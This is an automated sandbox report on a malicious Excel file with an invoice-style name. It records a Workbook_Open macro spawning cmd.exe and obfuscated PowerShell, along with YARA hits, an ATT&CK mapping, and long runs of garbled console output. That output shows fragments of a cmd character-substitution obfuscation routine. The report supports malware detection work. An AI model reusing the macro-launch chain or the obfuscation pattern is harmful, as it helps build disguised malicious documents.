Analysis Report 634 #U8acb#U6c42#U66f8#Uff082018#U5e7410#U6708#Uff09.xls

Overview

General Information

Joe Sandbox Version: 24.0.0 Fire Opal
Analysis ID: 87288
Start date: 31.10.2018
Start time: 08:08:38
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 2m 43s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: 634 #U8acb#U6c42#U66f8#Uff082018#U5e7410#U6708#Uff09.xls
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Flash 26, Java 8.0.1440.1)
Number of analysed new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • GSI enabled (VBA)
Analysis stop reason: Timeout
Detection: MAL
Classification: mal64.expl.winXLS@13/3@0/0
EGA Information: Failed
HDC Information: Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Adjust boot time
  • Found application associated with file extension: .xls
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Simulate clicks
  • Number of clicks 102
  • Scroll down
  • Close Viewer
Warnings:
  • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: powershell.exe

Detection

Strategy | Score | Range | Reporting | Detection
Threshold | 64 | 0 - 100 | Report FP / FN | malicious

Confidence

Strategy | Score | Range | Further Analysis Required?
Threshold | 5 | 0 - 5 | false


Classification

Analysis Advice

Sample has a GUI, but Joe Sandbox has not found any clickable buttons, likely more UI automation may extend behavior



Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control
Valid Accounts | Command-Line Interface 21 | Winlogon Helper DLL | Process Injection 1 | Disabling Security Tools 1 | Credential Dumping | Process Discovery 1 | Application Deployment Software | Data from Local System | Data Compressed | Data Obfuscation
Replication Through Removable Media | PowerShell 1 | Port Monitors | Accessibility Features | Process Injection 1 | Network Sniffing | Security Software Discovery 1 | Remote Services | Data from Removable Media | Exfiltration Over Other Network Medium | Fallback Channels
Drive-by Compromise | Scripting 2 | Accessibility Features | Path Interception | Deobfuscate/Decode Files or Information 1 | Input Capture | File and Directory Discovery 1 | Windows Remote Management | Data from Network Shared Drive | Automated Exfiltration | Custom Cryptographic Protocol
Exploit Public-Facing Application | Exploitation for Client Execution 1 | System Firmware | DLL Search Order Hijacking | Scripting 2 | Credentials in Files | System Information Discovery 21 | Logon Scripts | Input Capture | Data Encrypted | Multiband Communication

Signature Overview


AV Detection:

Multi AV Scanner detection for submitted file
Source: 634 #U8acb#U6c42#U66f8#Uff082018#U5e7410#U6708#Uff09.xls, virustotal: Detection: 34%
Yara signature match
Source: 00000008.00000002.1587961229.018E0000.00000004.sdmp, type: MEMORY, Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000006.00000002.1575622489.003C0000.00000004.sdmp, type: MEMORY, Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000006.00000000.1573363401.00010000.00000004.sdmp, type: MEMORY, Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000006.00000000.1575210257.00010000.00000004.sdmp, type: MEMORY, Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000006.00000000.1574110051.00010000.00000004.sdmp, type: MEMORY, Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000008.00000002.1586592723.01250000.00000004.sdmp, type: MEMORY, Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000006.00000003.1575306060.00010000.00000004.sdmp, type: MEMORY, Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000006.00000000.1574574233.00010000.00000004.sdmp, type: MEMORY, Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000006.00000002.1575587396.00150000.00000004.sdmp, type: MEMORY, Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =

Spreading:

Enumerates the file system
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Process created: C:\Windows\System32\cmd.exe

System Summary:

Very long command line found
Source: unknown, Process created: Commandline size = 4855
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Process created: Commandline size = 4855
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: 634 #U8acb#U6c42#U66f8#Uff082018#U5e7410#U6708#Uff09.xls, OLE, VBA macro line: Sub Workbook_Open()
Source: VBA code instrumentation, OLE, VBA macro: Module ThisWorkbook, Function Workbook_Open, Name: Workbook_Open
Document contains embedded VBA macros
Source: 634 #U8acb#U6c42#U66f8#Uff082018#U5e7410#U6708#Uff09.xls, OLE indicator, VBA macros: true
Classification label
Source: classification engine, Classification label: mal64.expl.winXLS@13/3@0/0
Creates files inside the user directory
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\634 #U8acb#U6c42#U66f8#Uff082018#U5e7410#U6708#Uff09.LNK
Creates temporary files
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\HERBBL~1\AppData\Local\Temp\CVR85A0.tmp
Document contains an OLE Workbook stream indicating a Microsoft Excel file
Source: 634 #U8acb#U6c42#U66f8#Uff082018#U5e7410#U6708#Uff09.xls, OLE indicator, Workbook stream: true
Found command line output
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<.......k...........................X.1...f.*.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<.......q...........................k.......................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................6.0. .=.=. .9.0. ...w...........................<.......q................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<.......}....................................Le.4.1...f.......f.......1.............SFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.....................................A..@....A.H.D.\...\......w..A...1.....B..B........Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.5.5.,.1.!. .................A..@....A.H.D.=Me.X.1...1.*....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<...................................X.1...f.*.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<...........................................................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................5.5. .=.=. .9.0. ...............................<........................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<............................................Le.4.1...f.......f.......1.............SFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.....................................A..@....A...E.\...\......w..A...1.....<..<........Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.6.5.,.1.!. .................A..@....A...E.=Me.X.1...1.*....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<...................................X.1...f.*.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<...........................................................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................6.5. .=.=. .9.0. ...............................<........................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<............................................Le.4.1...f.......f.......1.............SFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.....................................A..@....A...E.\...\......w..A...1.................Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.6.0.,.1.!. .................A..@....A...E.=Me.X.1...1.*....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<......."...........................X.1...f.*.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<.......(...........................".......................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................6.0. .=.=. .9.0. ...............................<.......(................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<.......4....................................Le.4.1...f.......f.......1.............SFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<.......@...........................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<.......G...........................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.......S.............................A..@....A...E.\...\......w..A...1.....<..<........Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.5.9.,.1.!. .................A..@....A...E.=Me.X.1...1.*....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<......._...........................X.1...f.*.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<.......e..........................._.......................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................5.9. .=.=. .9.0. ...k...........................<.......e................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<.......q....................................Le.4.1...f.......f.......1.............SFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<.......}...........................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.....................................A..@....A...E.\...\......w..A...1.................Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<...................................X.1...f.*.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<...........................................................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................6.5. .=.=. .9.0. ...............................<........................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<............................................Le.4.1...f.......f.......1.............SFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.....................................A..@....A...E.X...X......w..A...1.....7..7........Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.7.,.1.!. ...................A..@....A...E.=Me.X.1...1.(....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<...................................X.1...f.(.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<...........................................................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................7. .=.=. .9.0. .................................<........................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<............................................Le.4.1...f.......f.......1.............QFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.....................................A..@....A...E.X...X......w..A...1.................Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.5.,.1.!. ...................A..@....A...E.=Me.X.1...1.(....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<...................................X.1...f.(.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<...........................................................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................5. .=.=. .9.0. ....."...........................<........................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<.......(....................................Le.4.1...f.......f.......1.............QFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<.......4...........................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<.......;...........................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.......G.............................A..@....A.`.E.\...\......w..A...1.................Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.2.9.,.1.!. .................A..@....A.`.E.=Me.X.1...1.*....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<.......S...........................X.1...f.*.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<.......Y...........................S.......................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................2.9. .=.=. .9.0. ..._...........................<.......Y................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<.......e....................................Le.4.1...f.......f.......1.............SFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<.......q...........................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<.......x.............................E...A...E...1..`E...A..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.....................................A..@....A.81E.\...\......w..A...1.................Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.2.0.,.1.!. .................A..@....A.81E.=Me.X.1...1.*....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<...................................X.1...f.*.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<...........................................................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................2.0. .=.=. .9.0. ...............................<........................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<............................................Le.4.1...f.......f.......1.............SFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.....................................A..@....A.81E.X...X......w..A...1.....<..<........Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.5.,.1.!. ...................A..@....A.81E.=Me.X.1...1.(....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<...................................X.1...f.(.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<...........................................................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................5. .=.=. .9.0. .................................<........................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<............................................Le.4.1...f.......f.......1.............QFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.....................................A..@....A.81E.\...\......w..A...1.................Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.4.8.,.1.!. .................A..@....A.81E.=Me.X.1...1.*....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<...................................X.1...f.*.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<.......:...................................................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................4.8. .=.=. .9.0. ...@...........................<.......:................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<.......F....................................Le.4.1...f.......f.......1.............SFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<.......R...........................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<.......Y...........................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.......e.............................A..@....A.81E.\...\......w..A...1.....B..B........Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.1.2.,.1.!. .................A..@....A.81E.=Me.X.1...1.*....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<.......q...........................X.1...f.*.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<.......w...........................q.......................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................1.2. .=.=. .9.0. ...}...........................<.......w................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<............................................Le.4.1...f.......f.......1.............SFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.....................................A..@....A.81E.X...X......w..A...1.................Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.1.,.1.!. ...................A..@....A.81E.=Me.X.1...1.(....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<...................................X.1...f.(.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<...........................................................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................1. .=.=. .9.0. .................................<........................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<............................................Le.4.1...f.......f.......1.............QFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.....................................A..@....A..CE.\...\......w..A...1.....<..<........Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.4.8.,.1.!. .................A..@....A..CE.=Me.X.1...1.*....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<...................................X.1...f.*.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<...........................................................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................4.8. .=.=. .9.0. ...............................<........................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<............................................Le.4.1...f.......f.......1.............SFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.....................................A..@....A..CE.\...\......w..A...1.....w..b........Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.3.7.,.1.!. .................A..@....A..CE.=Me.X.1...1.*....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<.......(...........................X.1...f.*.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<...................................(.......................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................3.7. .=.=. .9.0. ...4...........................<........................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<.......:....................................Le.4.1...f.......f.......1.............SFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<.......F...........................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<.......M...........................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.......Y.............................A..@....A..CE.\...\......w..A...1.....<..<........Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<.......e...........................X.1...f.*.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<.......k...........................e.......................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................4.8. .=.=. .9.0. ...q...........................<.......k................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<.......w....................................Le.4.1...f.......f.......1.............SFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.....................................A..@....A..CE.\...\......w..A...1.....w..b........Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.2.8.,.1.!. .................A..@....A..CE.=Me.X.1...1.*....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<...................................X.1...f.*.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<...........................................................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................2.8. .=.=. .9.0. ...............................<........................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<............................................Le.4.1...f.......f.......1.............SFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.....................................A..@....A..CE.\...\......w..A...1.....<..<........Jump to behavior
